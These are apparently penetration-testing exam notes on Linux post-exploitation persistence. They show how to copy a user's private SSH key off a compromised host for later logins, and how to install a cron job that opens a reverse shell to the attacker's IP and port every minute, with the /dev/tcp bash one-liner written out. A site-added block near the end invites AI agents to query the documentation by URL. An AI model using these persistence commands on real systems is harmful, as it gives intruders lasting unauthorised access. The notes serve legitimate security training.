# Linux Persistence

## Persistence Via SSH Keys

* Linux is typically deployed as a server operating system and as a result, Linux servers are typically accessed remotely via services/protocols such as SSH.
* If SSH is enabled and running on a Linux system you have compromised, you can take advantage of the SSH configuration to establish persistent access on the target system.
* In most cases Linux servers will have key-based authentication enabled for the SSH service, allowing users to access the Linux system remotely without the need for a password.
* After gaining access to a Linux system, we can transfer the SSH private key of a specific user account to our system and use that SSH private key for all future authentication and access.

### Copying the id\_rsa (Private SSH Key) from Target System to Local System

To retrieve the `id_rsa` (private SSH key) from the target system to your local system, use the following `scp` command:

```sh
scp <user>@<ip>:<path_to_id_rsa> <path_to_put>
```

This command copies the private key from the target system to your local system. Make sure to set the correct paths.

#### Setting Permissions for id\_rsa

To set the appropriate permissions for `id_rsa`, use the following command:

```sh
chmod 400 id_rsa
```

This command restricts the file permissions on `id_rsa` to ensure it is only readable by the owner.

#### Logging into the Target System using the Private Key

To log in to the target system using the private key, use the following command:

```sh
ssh -i id_rsa <user>@<ip>
```

This command establishes an SSH connection to the target system, authenticating using the provided private key. Ensure you replace `<user>` and `<ip>` with the correct values.

## Persistence Via Cron Jobs

* Linux implements task scheduling through a utility called Cron. Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.
* An application, or script that has been configured to be run repeatedly with Cron is known as a Cron job.
* We can use cron jobs to execute a command or script at a fixed interval to ensure we have persistent access to the target system.

<figure><img src="/files/7TX2QTx0NFQiesZ3CcUg" alt=""><figcaption><p>Anatomy Of A Cron Job</p></figcaption></figure>

### Setting Up a Cron Job for Maintaining Access

To create a cron job on the target Linux system that establishes a connection to your local system every minute, follow these steps:

1. Create a file named "cron" with the desired cron job configuration:

   ```sh
   echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'" > cron
   ```
2. Install the cron job by updating the crontab:

   ```sh
   crontab cron
   ```

#### Important Note

After setting up the cron job, ensure you have a listener set up on your local system. This way, every minute, the target system will attempt to connect to your local system, allowing you to maintain access.

***

***

***

**`Hacker's Mantra:`**`The art of hacking: where creativity meets technology.`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/post-exploitation/linux-persistence.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.